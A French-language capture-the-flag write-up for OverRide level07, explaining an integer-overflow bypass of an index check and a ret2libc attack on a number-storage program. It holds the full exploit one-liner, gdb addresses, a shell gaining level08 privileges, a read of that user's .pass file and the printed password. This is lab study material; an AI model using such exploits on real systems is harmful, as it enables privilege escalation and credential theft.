C'est un program qui gere des valeurs que le user a tape.
ce program fait des memsets sur les arguments et les variables d'environnement donc on ne peut pas stocker nos shellcode.

0xffffd534 = address of the data
0xffffd6fc = where the ret address of main is 

0xffffd6fc - 0xffffd534 = 456
Un index prend 4 octet donc
456 / 4 = 114

Donc pour modifier le ret de main il faut donner `114` comme index

Sauf que 114 % 3 == 0 donc il ne passe pas a la condition
Pour modifier le index qu’on veut on va overflow le int.
Quand il check si c'est un modulo de 3, il n'est pas un modulo donc ca passe la protection.

(Overflow + 456) / 4 = 1073741938

On va faire un ret2libc car on a la flemme de mettre des shellcodes.

“/bin/sh”
0x0068732f.          h  s  /
0x6e69622f      n i b /

(gdb) unset environment LINES
(gdb) unset environment COLUMNS


Number:  6845231 // 0x0068732f
Index: 2

Number:  1852400175 //0x6e69622f 
Index:1 

(gdb) x/s 0xffffd548
0xffffd548:	 "/bin/sh"
Number: 4294956360 // 0xffffd548 <- ca va varier donc faut chercher a la main quand on est pas sur gdb
Index: 116



P system
Number: 4159090384 / 0xf7e6aed0  
Index : 1073741938


iCi on a réussi a trouver nos strings sur 4294956376 donc on a juste ajouter 16 

level07@OverRide:~$ python -c 'print("store\n6845231\n2\n" + "store\n1852400175\n1\n" + "store\n4294956376\n116\n" + "store\n4159090384\n1073741938\n" + "quit\n")' > /tmp/q ; cat /tmp/q - | ./level07
----------------------------------------------------
Welcome to wil's crappy number storage service!
----------------------------------------------------
Commands:
store - store a number into the data storage
read  - read a number from the data storage
quit  - exit the program
----------------------------------------------------
wil has reserved some storage :>
----------------------------------------------------

Input command:  Number:  Index:  Completed store command successfully
Input command:  Number:  Index:  Completed store command successfully
Input command:  Number:  Index:  Completed store command successfully
Input command:  Number:  Index:  Completed store command successfully


id
uid=1007(level07) gid=1007(level07) euid=1008(level08) egid=100(users) groups=1008(level08),100(users),1007(level07)
cat /home/users/level08/.pass
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
